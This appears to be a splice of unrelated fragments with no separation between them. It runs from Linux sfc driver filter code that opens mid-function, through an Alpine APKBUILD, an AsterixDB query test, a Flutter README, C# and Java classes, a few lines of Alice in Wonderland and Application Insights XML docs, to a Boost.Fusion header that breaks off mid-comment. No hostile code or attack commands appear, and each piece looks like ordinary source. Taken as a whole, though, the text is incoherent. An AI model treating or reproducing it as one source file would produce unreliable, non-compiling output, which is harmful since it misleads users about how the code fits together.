"expired filter %d [queue %u flow %u]\n",
index, channel_idx, flow_id);
channel->rps_flow_id[index] = RPS_FLOW_ID_INVALID;
}
if (++index == size) {
if (++channel_idx == efx->n_channels)
channel_idx = 0;
index = 0;
}
}
efx->rps_expire_channel = channel_idx;
efx->rps_expire_index = index;
spin_unlock_bh(&efx->filter_lock);
return true;
}
#endif /* CONFIG_RFS_ACCEL */
/**
* efx_filter_is_mc_recipient - test whether spec is a multicast recipient
* @spec: Specification to test
*
* Return: %true if the specification is a non-drop RX filter that
* matches a local MAC address I/G bit value of 1 or matches a local
* IPv4 or IPv6 address value in the respective multicast address
* range. Otherwise %false.
*/
bool efx_filter_is_mc_recipient(const struct efx_filter_spec *spec)
{
if (!(spec->flags & EFX_FILTER_FLAG_RX) ||
spec->dmaq_id == EFX_FILTER_RX_DMAQ_ID_DROP)
return false;
if (spec->match_flags &
(EFX_FILTER_MATCH_LOC_MAC | EFX_FILTER_MATCH_LOC_MAC_IG) &&
is_multicast_ether_addr(spec->loc_mac))
return true;
if ((spec->match_flags &
(EFX_FILTER_MATCH_ETHER_TYPE | EFX_FILTER_MATCH_LOC_HOST)) ==
(EFX_FILTER_MATCH_ETHER_TYPE | EFX_FILTER_MATCH_LOC_HOST)) {
if (spec->ether_type == htons(ETH_P_IP) &&
ipv4_is_multicast(spec->loc_host[0]))
return true;
if (spec->ether_type == htons(ETH_P_IPV6) &&
((const u8 *)spec->loc_host)[0] == 0xff)
return true;
}
return false;
}
# Contributor: Oleg Titov <oleg.titov@gmail.com>
# Maintainer: Oleg Titov <oleg.titov@gmail.com>
pkgname=py3-catalogue
pkgver=2.0.1
pkgrel=0
pkgdesc="Super lightweight function registries for your library"
url="https://github.com/explosion/catalogue"
arch="noarch"
license="MIT"
depends="py3-importlib-metadata"
makedepends="py3-setuptools"
checkdepends="py3-pytest"
subpackages="$pkgname-doc"
source="$pkgname-$pkgver.tar.gz::https://github.com/explosion/catalogue/archive/v$pkgver.tar.gz"
builddir="$srcdir/catalogue-$pkgver"
build() {
python3 setup.py build
}
check() {
pytest-3 catalogue/tests/test_catalogue.py
}
package() {
python3 setup.py install --prefix=/usr --root="$pkgdir"
install -Dm644 README.md "$pkgdir/usr/share/doc/$pkgname/README.md"
}
sha512sums="a0fd0dcccbd8dfa2662b058882118c73b5d1afbbadda9a03d21212b7c75dc79d78432d31a1922523491aad092af20463ce1bbfb3cd286d95bab367cb2f67ed55 py3-catalogue-2.0.1.tar.gz"
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
{
"f1": (SELECT value BITCLEAR(6, 1))[0],
"f2": (SELECT value BITCLEAR(6, [1, 2]))[0],
"f3": (SELECT value BITCLEAR(31, [1, 2, 4, 5]))[0],
"f4": (SELECT value BITCLEAR(int8("31"), [int16("1"), float("2"), double("4"), 5]))[0]
};
# will_pop_scope_demo
A demo that detects whether a page is about to be popped.
Featured in MTechViral's YouTube video: https://www.youtube.com/watch?v=fYBCzgBRkb4&list=PLR2qQy0Zxs_Wot7YfLeeKdMlJ9838C_w0&index=2
## Example
![](../../../image/will_pop.png)
![](../../../image/will_pop_form.png)
## Getting Started
For help getting started with Flutter, view our online
[documentation](https://flutter.io/).
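
In Flutter, intercepting a pop is typically done with a `WillPopScope` widget. The sketch below is illustrative only — the widget names and dialog text are assumptions, not taken from this demo's source:

```dart
import 'package:flutter/material.dart';

class ConfirmExitPage extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    // WillPopScope intercepts the back button / back gesture for this route.
    return WillPopScope(
      onWillPop: () async {
        // Ask the user before allowing the route to be popped.
        final leave = await showDialog<bool>(
          context: context,
          builder: (ctx) => AlertDialog(
            title: Text('Discard changes?'),
            actions: [
              TextButton(
                  onPressed: () => Navigator.pop(ctx, false),
                  child: Text('Stay')),
              TextButton(
                  onPressed: () => Navigator.pop(ctx, true),
                  child: Text('Leave')),
            ],
          ),
        );
        // Returning false keeps the page on the navigation stack.
        return leave ?? false;
      },
      child: Scaffold(appBar: AppBar(title: Text('Form'))),
    );
  }
}
```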
using System.Collections.Generic;
using Volo.Abp.AspNetCore.Mvc.UI.Bundling;
namespace Volo.CmsKit.Public.Web.Pages.CmsKit.Shared.Components.ReactionSelection
{
public class ReactionSelectionStyleBundleContributor : BundleContributor
{
public override void ConfigureBundle(BundleConfigurationContext context)
{
context.Files.AddIfNotContains("/Pages/CmsKit/Shared/Components/ReactionSelection/default.css");
}
}
}
'Go on with the next verse,' the Gryphon repeated impatiently: 'it
begins "I passed by his garden."'
Alice did not dare to disobey, though she felt sure it would all come
wrong, and she went on in a trembling voice:--
<?xml version="1.0"?>
<doc xml:lang="en">
<assembly>
<name>Microsoft.AI.WindowsServer</name>
</assembly>
<members>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer">
<summary>
A telemetry initializer that will gather Azure Web App Role Environment context information.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppNameEnvironmentVariable">
<summary>Azure Web App name corresponding to the resource name.</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppHostNameEnvironmentVariable">
<summary>Azure Web App Hostname. This will include the deployment slot, but will be same across instances of same slot.</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer">
<summary>
A telemetry initializer that will gather Azure Role Environment context information.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer">
<summary>
A telemetry context initializer that will set component context version on the base of BuildInfo.config information.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.version">
<summary>
The version for this component.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes version of the telemetry item with the version obtained from build info if it is available.
</summary>
<param name="telemetry">The telemetry context to initialize.</param>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.LoadBuildInfoConfig">
<summary>
Loads BuildInfo.config and returns XElement.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.GetVersion">
<summary>
Gets the version for the current application. If the version cannot be found, we will return the passed in default.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule">
<summary>
Telemetry module that sets developer mode to true when is not already set AND managed debugger is attached.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.IsDebuggerAttached">
<summary>
Function that checks whether debugger is attached with implementation that can be replaced by unit test code.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)">
<summary>
Gives the opportunity for this telemetry module to initialize configuration object that is passed to it.
</summary>
<param name="configuration">Configuration object.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer">
<summary>
A telemetry context initializer that will gather device context information.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Populates device properties on a telemetry item.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer">
<summary>
Obsolete. A telemetry context initializer that used to populate role instance name. Preserved for backward compatibility.
Note that role instance will still be populated with the machine name as in the previous versions.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Obsolete method.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.instance">
<summary>
The singleton instance for our reader.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleName">
<summary>
The Azure role name (if any).
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleInstanceName">
<summary>
The Azure role instance name (if any).
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader"/> class.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Instance">
<summary>
Gets or sets the singleton instance for our application context reader.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.BaseDirectory">
<summary>
Gets or sets the base directory where the hunt for application DLLs is to start.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Initialize">
<summary>
Initializes the current reader with respect to its environment.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleName">
<summary>
Gets the Azure role name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleInstanceName">
<summary>
Gets the Azure role instance name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader">
<summary>
The reader is platform specific and applies to .NET applications only.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.Instance">
<summary>
Gets or sets the singleton instance for our application context reader.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetHostSystemLocale">
<summary>
Gets the host system locale.
</summary>
<returns>The discovered locale.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetDeviceType">
<summary>
Gets the type of the device.
</summary>
<returns>The type for this device as a hard-coded string.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetDeviceUniqueId">
<summary>
Gets the device unique ID, or uses the fallback if none is available due to application configuration.
</summary>
<returns>
The discovered device identifier.
</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetOemName">
<summary>
Gets the device OEM.
</summary>
<returns>The discovered OEM.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetDeviceModel">
<summary>
Gets the device model.
</summary>
<returns>The discovered device model.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetNetworkType">
<summary>
Gets the network type.
</summary>
<returns>The discovered network type.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.RunWmiQuery(System.String,System.String,System.String)">
<summary>
Runs a single WMI query for a property.
</summary>
<param name="table">The table.</param>
<param name="property">The property.</param>
<param name="defaultValue">The default value of the property if WMI fails.</param>
<returns>The value if found, Unknown otherwise.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader">
<summary>
The user context reader interface used while reading user related information in a platform specific way.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader.Initialize">
<summary>
Initializes the current reader with respect to its environment.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader.GetRoleName">
<summary>
Gets the Azure role name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader.GetRoleInstanceName">
<summary>
Gets the Azure role instance name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role">
<summary>
Represents a role that is defined as part of a hosted service.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role.#ctor(System.Object)">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role"/> class.
</summary>
<param name="targetObject">The target object.</param>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role.Name">
<summary>
Gets the name of the role as it is declared in the service definition file.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role.GetTargetObjectInstance(System.Type,System.Object[])">
<summary>
Gets the target object instance.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
<returns>
The activated instance, if one is required.
</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment">
<summary>
Provides information about the configuration, endpoints, and status of running role instances.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment"/> class.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.IsAvailable">
<summary>
Gets a value indicating whether the role instance is running in the Windows Azure environment.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.DeploymentId">
<summary>
Gets the unique identifier of the deployment in which the role instance is running.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.CurrentRoleInstance">
<summary>
Gets a RoleInstance object that represents the role instance in which the code is currently running.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.GetTargetObjectInstance(System.Type,System.Object[])">
<summary>
Gets the target object instance.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
<returns>
The activated instance, if one is required.
</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance">
<summary>
Represents an instance of a role.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.#ctor(System.Object)">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance"/> class.
</summary>
<param name="targetObject">The target object.</param>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.Id">
<summary>
Gets the instance identifier (ID) of the role instance.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.Role">
<summary>
Gets the Role object that is associated with the role instance.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.GetTargetObjectInstance(System.Type,System.Object[])">
<summary>
Gets the target object instance.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
<returns>
The activated instance, if one is required.
</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject">
<summary>
A runtime bound object for a given .NET type.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.targetType">
<summary>
The target type for our object.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.targetObject">
<summary>
The target object.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.#ctor(System.Type,System.Object[])">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject"/> class.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.TargetType">
<summary>
Gets or sets the type of the target.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.TargetObject">
<summary>
Gets or sets the target object.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetTargetObjectInstance(System.Type,System.Object[])">
<summary>
Gets the target object instance.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
<returns>The activated instance, if one is required.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetProperty(System.String,System.Object[])">
<summary>
Gets the property.
</summary>
<param name="name">The name.</param>
<param name="args">The arguments.</param>
<returns>The value for our property.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetProperty(System.String,System.Type[],System.Object[])">
<summary>
Gets the property.
</summary>
<param name="name">The name.</param>
<param name="parameterTypes">The parameter types.</param>
<param name="args">The arguments.</param>
<returns>The value for our property.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetProperty(System.String,System.Reflection.BindingFlags,System.Type[],System.Object[])">
<summary>
Gets the property.
</summary>
<param name="name">The name.</param>
<param name="bindingFlags">The binding flags.</param>
<param name="parameterTypes">The parameter types.</param>
<param name="args">The arguments.</param>
<returns>The value for our property.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.InvokeHelper(System.String,System.Reflection.BindingFlags,System.Object[],System.Globalization.CultureInfo)">
<summary>
Invocation helper for calling any member on our target object.
</summary>
<param name="name">The name.</param>
<param name="bindingFlags">The binding flags.</param>
<param name="args">The arguments.</param>
<param name="culture">The culture.</param>
<returns>The return value for our invocation.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.ServiceRuntime">
<summary>
The wrapper for the Azure Service Runtime.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.ServiceRuntime.GetRoleEnvironment(System.String)">
<summary>
Gets the role environment.
</summary>
<param name="baseDirectory">The base directory.</param>
<returns>
The role environment object.
</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.TypeHelpers.GetLoadedType(System.String,System.String)">
<summary>
Gets the type by type name from the assembly.
</summary>
<param name="typeName">The type name.</param>
<param name="assemblyName">The assembly name.</param>
<returns>Return type from assembly loaded in the process by assembly and type name.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource">
<summary>
ETW EventSource tracing class.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource.Log">
<summary>
Instance of the WindowsServerEventSource class.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource.Keywords">
<summary>
Keywords for the PlatformEventSource. Those keywords should match keywords in Core.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource.Keywords.UserActionable">
<summary>
Keyword for user-actionable events.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule">
<summary>
The module that subscribes to AppDomain.CurrentDomain.UnhandledException to send exceptions to ApplicationInsights.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule"/> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)">
<summary>
Initializes the telemetry module.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule.Dispose">
<summary>
Disposing UnhandledExceptionTelemetryModule instance.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule">
<summary>
The module that subscribes to TaskScheduler.UnobservedTaskException to send exceptions to ApplicationInsights.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)">
<summary>
Initializes the telemetry module.
</summary>
<param name="configuration">Telemetry Configuration used for creating TelemetryClient for sending exceptions to ApplicationInsights.</param>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule.Dispose">
<summary>
Disposing TaskSchedulerOnUnobservedTaskException instance.
</summary>
</member>
</members>
</doc>
/*
* Copyright 2011 Harald Wellmann.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied.
*
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.wicketstuff.osgi.util;
import java.util.Map;
import java.util.Map.Entry;
import org.apache.wicket.WicketRuntimeException;
import org.osgi.framework.BundleContext;
import org.osgi.framework.Filter;
import org.osgi.framework.FrameworkUtil;
import org.osgi.framework.InvalidSyntaxException;
import org.osgi.util.tracker.ServiceTracker;
/**
* A utility class for looking up services from the OSGi registry. The methods of this class wait
* for the service for a given timeout (default 10 seconds) and throw a
* {@code WicketRuntimeException} when no matching service becomes available during this period.
* <p>
* NOTE: Prefixing some method calls with our own class name is a workaround for a bug in the Oracle
* Java compiler, which does not occur when compiling in Eclipse.
*
* @author Harald Wellmann
*
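 * <p>
 * Typical usage from within an OSGi bundle (illustrative; {@code MyService}
 * stands for any service interface registered in the OSGi registry, and
 * {@code bundleContext} is the caller's {@code BundleContext}):
 * <pre>
 * MyService service = OsgiServiceLookup.getOsgiService(bundleContext, MyService.class);
 * </pre>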
*/
public class OsgiServiceLookup
{
public static final long DEFAULT_TIMEOUT = 10000;
public static <T> T getOsgiService(BundleContext bc, String className)
{
return OsgiServiceLookup.<T> getOsgiService(bc, className, DEFAULT_TIMEOUT, null);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type)
{
return getOsgiService(bc, type, DEFAULT_TIMEOUT);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type, Map<String, String> props)
{
return getOsgiService(bc, type, DEFAULT_TIMEOUT, props);
}
/**
* Returns a service matching the given criteria.
*
* @param <T>
* class implemented or extended by the service
* @param bc
* bundle context for accessing the OSGi registry
* @param type
* class implemented or extended by the service
* @param timeout
* maximum wait period in milliseconds
* @param props
* properties to be matched by the service
* @return matching service (not null)
	 * @throws WicketRuntimeException
	 *             when no matching service becomes available within the timeout
*/
public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout,
Map<String, String> props)
{
return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, props);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout)
{
return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, null);
}
@SuppressWarnings("unchecked")
public static <T> T getOsgiService(BundleContext bc, String className, long timeout,
Map<String, String> props)
{
ServiceTracker tracker = createServiceTracker(bc, className, props);
try
{
tracker.open();
Object svc = tracker.waitForService(timeout);
if (svc == null)
{
throw new WicketRuntimeException("gave up waiting for service " + className);
}
return (T)svc;
}
catch (InterruptedException exc)
{
throw new WicketRuntimeException(exc);
}
finally
{
tracker.close();
}
}
private static ServiceTracker createServiceTracker(BundleContext bc, String className,
Map<String, String> props)
{
if (props == null || props.isEmpty())
{
return new ServiceTracker(bc, className, null);
}
StringBuilder builder = new StringBuilder("(&(objectClass=");
builder.append(className);
builder.append(')');
for (Entry<String, String> entry : props.entrySet())
{
builder.append('(');
builder.append(entry.getKey());
builder.append('=');
builder.append(entry.getValue());
builder.append(')');
}
builder.append(')');
try
{
Filter filter;
filter = FrameworkUtil.createFilter(builder.toString());
ServiceTracker tracker = new ServiceTracker(bc, filter, null);
return tracker;
}
catch (InvalidSyntaxException exc)
{
throw new WicketRuntimeException(exc);
}
}
}
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
==============================================================================*/
#ifndef BOOST_PP_IS_ITERATING
#if !defined(FUSION_MAKE_SET_09162005_1125)
#define FUSION_MAKE_SET_09162005_1125
#include <boost/preprocessor/iterate.hpp>
#include <boost/preprocessor/repetition/enum_params.hpp>
#include <boost/preprocessor/repetition/enum_binary_params.hpp>
#include <boost/preprocessor/repetition/enum_params_with_a_default.hpp>
#include <boost/preprocessor/repetition/repeat_from_to.hpp>
#include <boost/fusion/support/config.hpp>
#include <boost/fusion/container/set/set.hpp>
#include <boost/fusion/support/detail/as_fusion_element.hpp>
#include <boost/fusion/support/pair.hpp>
#if !defined(BOOST_FUSION_DONT_USE_PREPROCESSED_FILES)
#include <boost/fusion/container/generation/detail/preprocessed/make_set.hpp>
#else
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#pragma wave option(preserve: 2, line: 0, output: "preprocessed/make_set" FUSION_MAX_SET_SIZE_STR".hpp")
#endif
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
This is an auto-generated file. Do not edit!
==============================================================================*/
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#pragma wave option(preserve: 1)
#define FUSION_HASH #
#endif
namespace boost { namespace fusion
{
struct void_;
namespace result_of
{
template <
BOOST_PP_ENUM_PARAMS_WITH_A_DEFAULT(
FUSION_MAX_VECTOR_SIZE, typename T, void_)
, typename Extra = void_
>
struct make_set;
template <>
struct make_set<>
{
typedef set<> type;
};
}
// XXX:
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
FUSION_HASH if defined(BOOST_CLANG)
BOOST_CXX14_CONSTEXPR
FUSION_HASH else
BOOST_CONSTEXPR
FUSION_HASH endif
#else
#if defined(BOOST_CLANG)
BOOST_CXX14_CONSTEXPR
#else
BOOST_CONSTEXPR
#endif
#endif
BOOST_FUSION_GPU_ENABLED
inline set<>
make_set()
{
return set<>();
}
#define BOOST_FUSION_AS_FUSION_ELEMENT(z, n, data) \
typename detail::as_fusion_element<BOOST_PP_CAT(T, n)>::type
#define BOOST_PP_FILENAME_1 <boost/fusion/container/generation/detail/pp_make_set.hpp>
#define BOOST_PP_ITERATION_LIMITS (1, FUSION_MAX_VECTOR_SIZE)
#include BOOST_PP_ITERATE()
#undef BOOST_FUSION_ELEMENT
#undef BOOST_FUSION_AS_ELEMENT
}}
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#undef FUSION_HASH
#pragma wave option(output: null)
#endif
#endif // BOOST_FUSION_DONT_USE_PREPROCESSED_FILES
#endif
#else // defined(BOOST_PP_IS_ITERATING)
///////////////////////////////////////////////////////////////////////////////
//
